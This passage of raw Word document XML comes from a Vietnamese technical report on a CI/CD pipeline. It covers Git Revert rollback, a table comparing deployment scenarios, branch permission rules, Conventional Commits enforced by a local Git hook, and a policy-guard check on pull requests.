          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Nhờ cơ chế gắn kết Docker Volume </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>db_data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> bền vững, toàn bộ dữ liệu nghiệp vụ của cơ sở dữ liệu hoàn toàn không bị ảnh hưởng hay thất thoát trong quá trình đảo ngược (RPO = 0).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Phương án 5B — Đảo ngược phiên bản có truy vết lịch sử qua Git Revert:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kỹ sư tạo một Revert PR đối với commit lỗi trên nhánh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>. Ngay khi PR được duyệt, đường ống CI/CD sẽ tự động kích hoạt Stage 4, kéo đúng hình ảnh đã được kiểm định của commit trước đó trên GHCR về triển khai lại trên VPS. Cách tiếp cận này bảo đảm tính toàn vẹn tuyệt đối của lịch sử kiểm toán mã nguồn.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H3"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>1.4.6. Bảng so sánh 5 kịch bản triển khai</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Kịch bản Triển khai</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Tác nhân Kích hoạt</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Thời gian Phục hồi (RTO)</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Mất mát Dữ liệu (RPO)</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Thời gian Gián đoạn Dịch vụ</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Cơ chế Đảm bảo Tính Toàn vẹn</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1. Khởi tạo máy chủ mới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Kỹ sư SysAdmin (Thủ công)</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3 - 5 phút</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0 giây</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Môi trường mới thiết lập</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Khởi tạo Volume </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>db_data</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> độc lập</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2. Tự động cập nhật phiên bản mới</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Merge PR </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>main</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Tự động)</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10 - 15 giây</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0 giây</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Không gián đoạn (0s)</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Thử nghiệm tạm thời &amp; Image Tag bất biến</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3. Cập nhật theo dịch vụ thay đổi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Commit thành phần (Tự động)</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5 - 8 giây</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0 giây</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Không gián đoạn (0s)</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Tách biệt Job Compose độc lập</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4. Xử lý trễ khởi động database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Pipeline Retry Loop (Tự động)</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20 - 45 giây</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0 giây</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Không gián đoạn (0s)</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Vòng lặp 30 lần thích ứng &amp; Dump log</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5. Khôi phục phiên bản cũ</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Kỹ sư On-Call / Git Revert</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&lt; 10 giây</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0 giây</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&lt; 5 giây (Tái tạo Web)</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Kéo Image Tag ổn định cũ trên GHCR</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H1"/>
        <w:spacing w:before="280" w:after="320"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>CHƯƠNG 2: QUẢN LÝ MÃ NGUỒN VÀ QUÉT LỖ HỔNG BẢO MẬT Ở CÁC GIAI ĐOẠN ĐẦU</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H2"/>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:t>2.1. Chặn lỗi commit từ máy lập trình viên bằng Git Hooks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Nhằm bảo đảm lịch sử mã nguồn luôn trong trạng thái rõ ràng, có khả năng truy vết và tuân thủ các quy chuẩn công nghiệp, dự án áp dụng mô hình phân cấp nhánh 3 tầng nghiêm ngặt:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Nhánh Cá nhân / Tính năng}    ──{PR chuẩn đóng góp}}    nhánh dev}    ──{PR Release phát hành}}    nhánh main}</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Chuẩn hóa thông điệp Commit theo Conventional Commits:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Mọi commit bắt buộc phải có cấu trúc dạng: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>&lt;loại&gt;(&lt;phạm_vi&gt;): &lt;mô tả&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, trong đó </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>&lt;loại&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (type) thuộc tập hợp xác định: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>feat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (tính năng mới), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>fix</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (khắc phục lỗi logic), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>sec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (vá lỗ hổng an ninh), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>ci</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (cấu hình tự động hóa), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>docs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (bổ sung tài liệu), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>refactor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (tái cấu trúc), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (kịch bản kiểm thử), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>chore</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (tác vụ phụ trợ), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (định dạng mã theo PSR-12), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>perf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (tối ưu hiệu năng).</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Kiểm soát chủ động tại máy trạm qua Git Hooks:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Để giảm thiểu thời gian chờ đợi phản hồi từ đường ống CI/CD trên đám mây, dự án phân phối sẵn cấu hình hook kiểm tra cục bộ trong tệp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>.githooks/commit-msg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>. Kỹ sư chỉ cần kích hoạt một lần thông qua câu lệnh:</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git config core.hooksPath .githooks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Kịch bản shell cục bộ sẽ tự động gọi trình xác thực </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>ci/policy_guard.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> và chặn đứng các commit có tiêu đề sai quy chuẩn ngay tại thời điểm lập trình viên thực hiện lệnh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>git commit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> trên máy trạm, giúp loại bỏ hoàn toàn các lỗi cú pháp sơ đẳng trước khi mã nguồn được đẩy lên kho lưu trữ.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H2"/>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:t>2.2. Kiểm tra quy tắc nhánh và Pull Request tại Stage 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Khi mã nguồn được đẩy lên máy chủ GitHub hoặc khi lập trình viên khởi tạo một Pull Request, cơ chế bảo vệ biên trung tâm được kích hoạt tự động thông qua công cụ chuyên dụng tự xây dựng </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>ci/policy_guard.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">. Đây là cửa ải đầu tiên trong đường ống CI/CD (Stage 1: Policy Guard), có thời gian thực thi cực ngắn từ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3 đến 5 giây</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>, áp dụng triệt để nguyên lý phát hiện lỗi sớm (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Shift-Left Governance Gate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>) và phản hồi tức thời (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Fail-Fast Principle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>) nhằm bảo vệ toàn vẹn tài nguyên tính toán của các giai đoạn quét an ninh nặng phía sau.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H3"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2.2.1. Ma trận phân quyền và mô hình toán học kiểm soát luồng phân nhánh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Để bảo vệ sự toàn vẹn của mã nguồn trên môi trường máy chủ sản xuất, hệ thống thiết lập ma trận phân cấp quyền hạn nghiêm ngặt giữa các nhánh:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bang"/>
        <w:spacing w:before="240" w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Bảng 2.1: Ma trận phân quyền và kiểm soát luồng phân nhánh</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Tên nhánh</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Phân loại</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Mục đích kỹ thuật</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Quyền Push trực tiếp</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Nguồn tiếp nhận Pull Request</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main</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Production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Mã nguồn chính thức triển khai môi trường thực tế</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Cấm hoàn toàn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Duy nhất từ nhánh tích hợp </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>dev</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dev</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Integration</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Tích hợp và kiểm thử hệ thống tổng thể</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Cấm trực tiếp</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Các nhánh tính năng của kỹ sư thành viên</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>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namng</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>haind</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>manhdx</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>anhld</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>mainp</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Feature / Dev</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Không gian làm việc cá nhân của 5 thành viên trong nhóm</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Được phép</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Nhận merge đồng bộ từ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>origin/dev</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Mô hình logic xác thực luồng Pull Request:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Gọi $B_{head}$ là nhánh nguồn (nơi lập trình viên đề xuất thay đổi) và $B_{base}$ là nhánh đích (nơi tiếp nhận mã nguồn) của một Pull Request $\mathcal{P}$. Không gian trạng thái hợp lệ $\mathcal{S}_{valid}$ được kiểm soát chặt chẽ bởi hàm đặc trưng logic:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">F(P) =  1    nếu } (B_{base} = "dev"} VÀ B_{head} ∉ {"main"}, "dev"}}) HOẶC (B_{base} = "main"} VÀ B_{head} = "dev"}) </w:t>
        <w:br/>
        <w:t xml:space="preserve"> 0    ngược lại (Chặn đứng tiến trình, xuất mã lỗi Exit Code 1)} </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Hàm logic này ngăn chặn triệt để tình huống lập trình viên vô tình mở Pull Request từ nhánh cá nhân thẳng vào nhánh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
